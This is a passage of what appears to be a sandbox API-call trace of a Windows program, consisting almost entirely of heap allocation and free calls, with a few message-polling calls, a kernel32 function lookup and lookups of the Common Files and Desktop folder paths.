0x690530 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a850 | out: hHeap=0x650000) returned 1 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690530 | out: hHeap=0x650000) returned 1 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a838 | out: hHeap=0x650000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a838 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a868 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690530 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cbe0 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.669] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690540 | out: hHeap=0x650000) returned 1 [0071.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690550 | out: hHeap=0x650000) returned 1 [0071.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cbb8 | out: hHeap=0x650000) returned 1 [0071.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0071.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a640 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6b8 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6e8 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a700 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a730 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a718 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a748 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a760 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7a8 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a790 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b4b0 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690510 | out: hHeap=0x650000) returned 1 [0071.670] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690510 [0071.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6b17a8 [0071.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690520 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b17a8 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690510 | out: hHeap=0x650000) returned 1 [0071.670] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cbb8 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a790 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690510 [0071.671] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a790 | out: hHeap=0x650000) returned 1 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc08 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a790 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7a8 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690520 [0071.671] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7a8 | out: hHeap=0x650000) returned 1 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc30 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7a8 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a760 [0071.671] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a748 [0071.671] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a718 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a730 [0071.671] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690560 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0071.672] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690550 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690540 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6e8 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690550 | out: hHeap=0x650000) returned 1 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6e8 | out: hHeap=0x650000) returned 1 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690540 | out: hHeap=0x650000) returned 1 [0071.672] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6e8 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690540 [0071.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xd) returned 0x76a6d0 [0071.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x76a6d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastError", lpUsedDefaultChar=0x0) returned 13 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0071.672] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6e8 | out: hHeap=0x650000) returned 1 [0071.672] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690540 | out: hHeap=0x650000) returned 1 [0071.672] GetLastError () returned 0x0 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690540 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6b17a8 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690550 [0071.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6e8 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690570 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690570 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0071.673] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a700 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a760 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7a8 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a748 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a730 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a718 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cc30 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.673] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690520 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6b19c8 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690560 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b19c8 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.673] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690520 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.673] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f94c8 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f94c8 | out: hHeap=0x650000) returned 1 [0071.673] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.674] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9318 [0071.674] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9318 | out: hHeap=0x650000) returned 1 [0071.674] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.674] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690520 [0071.674] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a5e0 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b468 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904e0 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cb40 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a5b0 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a598 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904c0 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68caf0 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a5f8 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770e10 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904f0 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cb68 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a580 | out: hHeap=0x650000) returned 1 [0071.674] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a568 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cac8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904b0 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68caa0 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a5c8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904d0 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cb18 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6e8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690550 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b17a8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690540 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a790 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cc08 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690510 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cbb8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7f0 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a808 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a820 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cbe0 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690530 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a850 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a838 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7d8 | out: hHeap=0x650000) returned 1 [0071.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b1588 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690580 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a610 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a628 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690500 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cb90 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a550 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690490 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904a0 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ca50 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a520 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a508 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a538 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ca78 | out: hHeap=0x650000) returned 1 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904a0 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f94c8 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f94c8 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904a0 | out: hHeap=0x650000) returned 1 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9318 [0071.676] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9318 | out: hHeap=0x650000) returned 1 [0071.676] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ca78 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a538 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690480 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a538 | out: hHeap=0x650000) returned 1 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ca50 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a538 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a508 [0071.676] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904a0 [0071.676] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a508 | out: hHeap=0x650000) returned 1 [0071.677] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cb90 [0071.677] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a508 [0071.677] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690490 [0071.677] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0071.677] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690500 [0071.677] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x61ed98 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0071.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a520 [0071.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690490 | out: hHeap=0x650000) returned 1 [0071.678] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x60f3fc, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0071.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690490 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770e10 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a550 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690500 | out: hHeap=0x650000) returned 1 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a520 | out: hHeap=0x650000) returned 1 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a508 | out: hHeap=0x650000) returned 1 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cb90 | out: hHeap=0x650000) returned 1 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904a0 | out: hHeap=0x650000) returned 1 [0071.679] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cb90 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a508 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904a0 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a508 | out: hHeap=0x650000) returned 1 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cbb8 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a508 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a520 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690500 [0071.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a520 | out: hHeap=0x650000) returned 1 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc08 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a520 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690580 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0071.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690530 [0071.679] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x61ed98 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690580 | out: hHeap=0x650000) returned 1 [0071.681] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x60f3fc, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690580 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b468 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 